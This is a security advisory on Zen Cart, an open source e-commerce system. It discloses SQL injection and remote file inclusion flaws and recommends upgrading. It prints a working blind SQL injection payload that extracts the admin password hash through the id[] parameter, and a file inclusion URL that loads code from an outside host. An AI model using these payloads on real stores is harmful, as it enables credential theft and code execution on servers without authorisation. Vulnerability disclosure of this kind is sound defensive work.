Zen Cart Multiple Vulnerabilities
August 15, 2021
Description:
Zen Cart is a descendant of the popular osCommerce project, and, like
osCommerce, Zen Cart is one of the most popular open source ecommerce
systems in the world. Unfortunately Zen Cart is vulnerable to quite
a number of different attacks, and in some circumstances may allow an
attacker to execute arbitrary code on the underlying web server with
the rights of the httpd process. In addition to remote code execution
several different SQL Injection attacks may be possible. The Zen Cart
developers have committed fixes for these issues to CVS and an updated
version of Zen Cart will be released soon to address the issues. All
users should upgrade their Zen Cart installation as soon as possible.
SQL injection:
There are a number of SQL Injection issues in Zen Cart that allow
an attacker to access and modify data that is stored in the
underlying database. The first of these issues occurs when sending
a malformed POST request to the ipn_main_handler.php script. The root
of the problem is that some unsanitized GPC data is sent directly
to the ipn_get_stored_session function, where it is then used in a
query. Also, since all of $_SESSION is recreated from the results
of this query, it is also possible to, for example, include arbitrary
files by UNION SELECTing attacker supplied data to overwrite certain
elements of the $_SESSION array. Another vulnerable function within
Zen Cart is the whos_online_session_recreate function. An attacker
could use this issue to send arbitrary SQL to an UPDATE statement
and, in newer MySQL versions, possibly subselect data. The issue that
I just described can be triggered by sending a request to the login
page with a malformed session id within the cookie. Once the attacker
successfully logs in, the old session id taken from the cookie will
then be passed to the vulnerable function, thus allowing an attacker
to inject arbitrary SQL. An attacker can also perform SQL Injection
attacks by specifying SQL in the quantity field while updating their
shopping cart, once logged in. The vulnerability here lies specifically
in the add_cart function. In regards to the shopping cart it is also
possible to perform SQL Injection attacks when adding items with
malformed attributes (specifically the id[] parameter) and also
when entering a malformed redemption code when checking out.
-99' UNION SELECT IF(MID(admin_pass,1,1)='2',1,0),2 FROM admin WHERE 1/*
Above is an example of data that could be sent via the id[] parameter
when adding items to the shopping cart. If the first character of the
admin password hash is 2 then an SQL error will NOT be shown.
Remote File Inclusion:
Zen Cart suffers from a few file inclusion vulnerabilities that may
lead to the execution of arbitrary code. Fortunately most of these
issues are only exploitable locally, due to the difficulty of getting
null bytes through Zen Cart's sanitization functions. For example, an
attacker is able to include arbitrary local files by specifying an
arbitrary path in the "typefilter" parameter, as traversal sequences
are never filtered out. However, below is a much more dangerous instance
of remote file inclusion in Zen Cart.
/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell
The above example is possible due to an uninitialized array being
passed to autoload_func.php. The issue as shown above does require
register_globals to be enabled, and with register_globals on it
allows for remote code execution.
Solution:
The Zen Cart developers have committed fixes for these issues to CVS and an updated
version of Zen Cart will be released soon to address the issues. All
users should upgrade their Zen Cart installation as soon as possible.
Credits:
James Bercegay of the GulfTech Security Research Team